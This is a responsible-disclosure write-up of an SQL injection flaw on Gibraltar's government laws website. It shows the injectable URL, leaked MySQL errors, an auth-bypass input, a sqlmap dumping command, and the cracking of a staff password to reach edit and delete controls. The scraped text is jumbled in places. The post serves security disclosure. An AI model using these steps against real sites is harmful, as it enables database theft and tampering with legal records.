“Rewriting the laws” of British Overseas territory Gibraltar with SQL Injection Special thanks to for coordinating with the responsible disclosure. Note: As of publishing this article, the vulnerable sections of the website have been shut down, effectively resolving the vulnerability. Gareth Corfield of The Register “Do UK residents need a visa to visit Gibraltar,” was what I needed an answer to, which is why I stumbled upon Gibraltar’s website. Being a British Overseas Territory, so it’s a bit confusing. My intention at around 11 o’ clock at night was to clarify just that — and get a solid goodnight’s sleep. Little did I realise this would turn into a long night of exploration. Borders and Coastguard Agency Gibraltar falls under the jurisdiction of the UK, yet has its own government and laws sort of The website had an outlink to , which looked like: Borders and Coastguard Agency Gibraltar Immigration Act http://www.gibraltarlaws.gov.gi/edit_article_o.php?group_id=000000062 page of Borders and Coastguard Agency, Gibraltar Law and Policies To an everyday internet user, this doesn’t mean much, but when the front page of HM Government of Gibraltar Laws and Legislation website looks as follows, a techie would get suspicious. Notice the logo at the bottom now as this is going to get interesting! Secure Site The outlink mentioned above, when clicked, displayed PDFs of laws and amendments under the as predictable: Gibraltar Immigration Act, SQL Injection and database dumping However, the dated website it could be vulnerable to . Adding just a simple character — a single quote: (which when encoded becomes ) The website was vulnerable to the easiest kind of . seemed like something ' %27 at the end of the URL indeed confirmed my suspicion. SQL Injection: error-based http://www.gibraltarlaws.gov.gi/edit_article_o.php?group_id=000000062%27 Output of the link with a single quote added: Unlike previous few pages which showed links to PDFs of laws and amendments, nothing appeared other than the page header for the link with a ‘at the end, or so it seemed at first glance. This could just have been an error due to a “bad URL,” i.e. a 404 — not found page. Upon selecting and highlighting the entire page, however, the black-on-black text became suddenly visible! Error in query: SELECT * FROM `article` WHERE group_id=’000000062'’ AND category=’c’. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘c’’ at line 1 That’s a proper MySQL error message spelling out the name of the table i.e. along with the fields that follow, giving an attacker the perfect opportunity to craft malicious input accordingly. article For those not familiar, in layman’s terms, deal with an attacker providing such a user input — such as a username or password which tricks the database engine processing that into treating the input as a to the database, as opposed to a mere data value. So, for example, normally username would be processed by a database engine normally, as a value. A crafted input provided in place of the username, like may instead cause a vulnerable system to let an attacker access the user’s (Michael’s) account without requiring a password. SQL Injection attacks value value, command michael michael'-- At this point, it was clear the website suffers from error-based SQL Injection — not at one, but many places. Also, changing the parameter to or an invalid value dumped all PDFs: group_id 0 Another place where this interesting flaw could be noticed was the section which, according to the page, Employment Tribunal Judgements “contains judgments, rulings and decisions passed by the Employment Tribunal in Gibraltar dating back to 1999.” Searching for just a single quote ( ) on the webpage, or a name with one, such as will lead to a rather verbose SQL error message: ‘ Derick O’Brian, Error in query: SELECT * FROM industrial_tribunal_judgement WHERE itj_title LIKE ‘%’%’ OR itj_case_number LIKE ‘%’%’ OR itj_keywords LIKE ‘%\’%’ AND itj_keywords LIKE ‘%%’ AND itj_keywords LIKE ‘%%’ AND itj_keywords LIKE ‘%%’ AND itj_keywords LIKE ‘%%’ AND (itj_tribunal = ‘dummy’ OR itj_tribunal = ‘t’ OR itj_tribunal = ‘a’) AND (itj_type = ‘dummy’ OR itj_type = ‘j’ OR itj_type = ‘d’ OR itj_type = ‘r’) ORDER BY itj_date_passed DESC. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘%’ OR itj_case_number LIKE ‘%’%’ OR itj_keywords LIKE ‘%\’%’ AND itj_keywords LI’ at line 1 Using a simple penetration testing and analysis tool like it isn’t too hard to peek further for what all the database of a vulnerable server contains. A simple test with a command like is enough to list all the databases and tables contained within a MySQL instance. sqlmap ./sqlmap.py -u <URL> --schema Out of these, everything else seemed to be either baseline information_schema SQL tables which contain routine information, or Gibraltar Laws website custom tables with public-facing information about laws, amendments, etc. The most interesting table out of all was . user The table when analysed further with command, revealed: the the IP addresses used at the time of account registration, and other information. This is information about staff members who likely manage the content on the website, with enough privileges to any articles, laws, amendments, and attached documents on the website — including pieces of legislation user sqlmap -t staff member names, usernames, password digests (hashes), edit or delete dating all the way back from 1887 to present day, 2020. Password analysis and cracking and other tools have inbuilt options to further analyse a table and offer quick dictionary-based ‘guessing’ of certain password digests on it, offline. A quick analysis of the digests revealed one of the passwords was extremely weak — a mere 6-digit date combination (perhaps a date of birth or anniversary). Although the password was stored in the table rather than the actual plaintext password, the password got easily revealed in After all, and to crack a 6-digit password would be a piece of cake. sqlmap digest less than a second. even a regular computer can very well throw over 100,000 guesses per second Once an attacker can get their hands on the username and password, they can or anything using the website’s CMS — including the very laws. modify delete The not-so-subtle links on every page make thiss possible: Modify|Delete Sample login screen presented prior to modifying or deleting content: Bam! A successful login enables an attacker to “rewrite any law”, delete or upload new PDFs and tamper with other data. Yup, not going to try deletion but I’m sure it works: Although suffice to say, while With malicious input such as crafted queries alone an attacker could modify, delete or tamper with any of the tables and database information. With more sophisticated SQL Injection payloads, one could even potentially achieve . the second-step of this exploit — password analysis and cracking looks impressive, the critical nature of SQL Injection vulnerability itself means it isn’t necessary. reverse-shell access So next time you choose to put a logo at the bottom, make sure you’re covered against the most common critical vulnerabilities. ;) Secure Site Props to the staff of HM Government of Gibraltar. Not only was the flaw resolved within a week of reporting — following the long holiday break, replacing the previous one. Doesn’t it look pretty? the same day a fresh website was launched Gibraltar Laws website launched Jan 6, 2020: © 2020. ( ). All Rights Reserved. Akshay ‘Ax’ Sharma Twitter
